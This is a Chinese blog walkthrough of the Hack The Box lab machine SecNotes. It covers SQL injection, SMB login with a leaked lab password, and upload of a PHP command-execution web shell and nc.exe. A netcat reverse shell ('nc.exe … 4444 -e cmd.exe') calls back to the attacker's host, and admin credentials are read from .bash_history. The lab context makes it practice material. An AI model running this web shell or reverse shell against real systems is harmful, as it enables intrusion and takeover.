【Hackthebox】【SecNotes】

最新推荐文章于 2023-04-21 00:10:47 发布
最新推荐文章于 2023-04-21 00:10:47 发布
阅读量777 收藏 1
点赞数 1
分类专栏: 经验心得 HTB靶场题解集合
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/86695205
版权

这次靶机是hackthebox里的SecNotes

靶机IP地址:10.10.10.97 

==========================================================================================

信息收集

nmap -sV -sC -T5 10.10.10.97

发现靶机开放了80端口和445端口

 

 

访问下80端口

是一个登陆页面,我们点击【Sign up now】来注册下账号,并登陆

 

登陆后,我们遇到一堆按钮,一个警告(个人信息泄露),同时也显示了我们的用户名

这里我们可以试着 CSRF,XSS,SQL注入等这些安全问题

 

我们试着SQL注入,我们重新回到账号注册页面

重新注册一个账号

进入页面时候,跳出一个窗口和一堆数据,说明是存在SQL注入的

 

其他的信息都不是很重要,重要的是这个【New Site】

靶机开了SMB服务,这个应该就是账号和密码了

使用smbclient登陆

smbclient //10.10.10.97/new-site -U "tyler"

用户名:tyler

密码:92g!mA8BGjOirkL%OG*&

 

我们查看下共享的内容

 看到一些跟网页有关的东西,但是似乎是跟我们从80上看到的内容是不一样的

 

我们试着从把全部端口扫描下看看,

 

我们访问下8808

是一个iis默认的页面

查看源码,我们也可以看到它引用的就是smb列出里面的png图片

然后我们通过上传一个php反弹shell

 

<?php
 if(isset($_REQUEST['cmd'])){
  $cmd = ($_REQUEST['cmd']);
  system($cmd);
  die;
 }
?>

然后我们put rec.php

我们还要put个nc上去

 

在我们的Kali上要监听端口

然后访问10.10.10.97:8808/rec.php?cmd=nc.exe 10.10.10.15.xx 4444 -e cmd.exe

得到shell

然后我们 切换到 用户目录下dir下

type下得到user flag

 

在刚刚dir我们发现一个很有趣的东西 bash.link

一个链接

 

这台机器上装了linux的子系统,我们找下bash的具体位置

 

我们cd 到Windows目录下用dir查找下

dir *.exe /b/s | findstr bash

/b:不显示修改日期等信息,只显示文件名

/s:显示指定目录和所有子目录中的文件

 

我们cd过去然后执行bash.exe

我们用python pty得到一个稳定的shell

python -c "import pty;pty.spawn('/bin/bash')"

我们查看下.bash_history的内容

我们得到了管理员的smb账号密码,然后我们登录下

 

我们一步步cd到root的Desktop然后dir发现root.txt

然后get root.txt 最后退出smb服务 读取刚刚获取的root.txt的文件内容

 

 

大方子
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-secnotes (IIS-php )
冬萍子癸水
02-12 325
1、扫描 445开了说明可能有smb登录,8808有http C:\root> masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-12 01:45:25 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www.hackthebox.eu/invite,查看源代码 发现提示 发现可疑的js文件:/js/inviteapi.min.js   inviteapi  邀请接口 查看该js 在控制台进行调用,给出了提示,
【Hack The Box】windows练习-- SecNotes
人间体佐菲的博客
11-01 268
【Hack The Box】windows练习-- SecNotes
Hack the box靶机 SecNotes
菜浪马废的博客
06-03 254
注册了一个admin‘ or ‘1’='1的用户 登录发现一个账户 看见bash.lnk 可以查看root.txt 也可以像下面这样 完成 好几天没学习了 因为有点心烦 特别爱的女孩 突然就走了 我知道错了也知道怎么改 可是根本没有机会改了 特别难受 只能学习了 因为我怕我闲下来了 就疯狂的想她 我真害怕我弄丢他 还是丢了 其实闲不闲下来 还是一直在想 真他妈的烦 ...
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
keys.zip (hackthebox)
12-05
hackthebox Can you decrypt the message? Zip password: hackthebox
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子Hack The Box笔测试和来自挑战在这里,我们有Hack The Box的演练。
HTB-SecNotes
最新发布
TA不懒,但还没有添加简介
04-21 323
HTB-SecNotes
No.75-HackTheBox-windows-SecNotes-Walkthrough渗透学习
qq_34801745的博客
03-24 317
** HackTheBox-windows-SecNotes-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/151 靶机难度:中级(4.5/10) 靶机发布日期:2019年1月14日 靶机描述: SecNotes is a medium difficulty machine, which highlights...
Hackthebox】【OZ】
大方子
01-19 1584
 这次靶机是Hackthebox里面的OZ ========================================================================================= 信息的收集   nmap -sV -sC -T5 -p- 10.10.10.96   这里我们看到开放了2个端口80和8080. 他们都是Werkzeu...
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6605
Hack The Box,一款有意思的渗透测试平台
hackthebox的网站使用教程
Ba1_Ma0的博客
03-20 1万+
Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获取验证码注册教程 网站url:https://blog.csdn.net/qq_45951598/article/details/115269108 然后我们进入网站的首页,这里我们演示的是旧ui,新ui的使用方法与旧的大致相同 使用google浏览器可以自动翻译网站上的英文,右击,然后选择翻译中文
hackthebox】【Dab】
大方子
02-03 2377
====================================================================================== 靶机的IP:10.10.10.86    信息的获取 用Nmap进行扫描 nmap -sC -T5 10.10.10.86   发现靶机开启了80,22,21,8080端口 我们先访问下80端口 ...
Hackthebox------Jerry
大方子
11-24 3046
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
Hack The Box——Luanne
江左盟的博客
12-06 1万+
目录 简介 信息收集 漏洞发现 Lua代码注入 漏洞利用 权限提升 用户r.michaels的Shell 总结 简介 靶机偏CTF类型,评分才2.3,评分这么低是有原因的。总体思路是通过lua代码注入获得WebShell,然后利用CVE-2010-2320读取普通用户ssh私钥文件,从而获得普通用户权限,最后通过解密enc文件,利用.htpasswd文件中的密码获得root权限。 信息收集 使用Nmap对目标主机进行端口扫描及服务识别,发现目标主机开启22、80和9001端口,且80
Hackthebox---Postman
qq_37027540的博客
01-28 878
Hackthebox靶机—Postman 获取内网ip 对靶机进行信息探测 发现存在四个端口开放(22,80,6379,10000),80端口和10000端口都是http服务,打开浏览器查看内容。 10000端口上起的服务是wenmin,使用searchspolit搜索存在漏洞,打开msfconsole,找到该模块,发现参数中需要账号密码,在浏览器上尝试一些弱密码都失败了,这里可...
Hack The Box:File Inclusion 漏洞深度剖析与实战解析
"这篇文档是关于Hack The Box平台上的File Inclusion漏洞利用的实战教程,主要涉及了Local File Inclusion(LFI)的概念、原因以及如何进行漏洞探测和利用。" 在网络安全领域,Local File Inclusion(LFI)是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值